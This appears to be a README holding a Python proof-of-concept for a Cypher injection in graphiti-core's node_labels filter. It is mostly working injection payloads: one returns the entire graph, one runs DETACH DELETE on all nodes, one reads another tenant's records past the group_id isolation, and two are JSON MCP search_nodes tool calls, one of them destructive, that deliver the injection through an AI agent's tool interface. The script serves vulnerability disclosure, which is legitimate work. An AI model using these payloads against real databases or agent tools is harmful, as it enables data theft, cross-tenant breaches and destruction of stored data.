README.md
Rendering markdown...
#!/usr/bin/env python3
"""
PoC: Cypher Injection via node_labels in graphiti-core (getzep/graphiti)
CVE-2026-32247 — CVSS 8.1
Vulnerability: search_filters.py joins user-supplied node_labels with '|' and
concatenates them into a raw Cypher WHERE clause without sanitization.
Affected: graphiti-core <= 0.28.1
Fixed in: 0.28.2
File: graphiti_core/search/search_filters.py (lines 91-92, 134-135)
"""
import json
def build_filter(node_labels: list[str]) -> str:
"""Exact reproduction of the vulnerable logic from search_filters.py:91-92."""
labels = "|".join(node_labels)
return "n:" + labels
def demo_injection():
print("=" * 60)
print("CVE-2026-32247 — Cypher Injection in graphiti-core")
print("=" * 60)
print()
# --- Benign usage ---
benign = build_filter(["Person", "Organization"])
print(f"[+] Benign filter : {benign}")
print(f" Cypher context : WHERE ({benign}) AND ...")
print()
# --- PoC 1: Full graph exfiltration ---
exfil_payload = ["Entity`) WITH n MATCH (x) RETURN x //"]
exfil = build_filter(exfil_payload)
print(f"[!] Exfil filter : {exfil}")
full_cypher_exfil = f"MATCH (n) WHERE ({exfil}) AND n.group_id = $group_id RETURN n"
print(f" Full Cypher :")
print(f" {full_cypher_exfil}")
print(f" ↑ The ) closes the WHERE, WITH pipelines a new MATCH, // drops the rest")
print()
# --- PoC 2: Full graph deletion ---
delete_payload = ["Entity`) WITH n MATCH (x) DETACH DELETE x //"]
delete_filter = build_filter(delete_payload)
print(f"[!] Delete filter : {delete_filter}")
print()
# --- PoC 3: Cross-tenant exfiltration (bypass group_id isolation) ---
cross_tenant = ["Entity`) WITH n MATCH (victim) WHERE victim.group_id = 'target_group' RETURN victim //"]
ct_filter = build_filter(cross_tenant)
print(f"[!] XTenant filter : {ct_filter[:80]}...")
print()
# --- MCP tool call payloads ---
print("-" * 60)
print("MCP tool call to trigger via search_nodes:")
print()
tool_call = {
"tool": "search_nodes",
"arguments": {
"query": "anything",
"entity_types": ["Entity`) WITH n MATCH (x) RETURN x //"],
},
}
print(json.dumps(tool_call, indent=2))
print()
tool_call_delete = {
"tool": "search_nodes",
"arguments": {
"query": "anything",
"entity_types": ["Entity`) WITH n MATCH (x) DETACH DELETE x //"],
},
}
print("Destructive variant:")
print(json.dumps(tool_call_delete, indent=2))
if __name__ == "__main__":
demo_injection()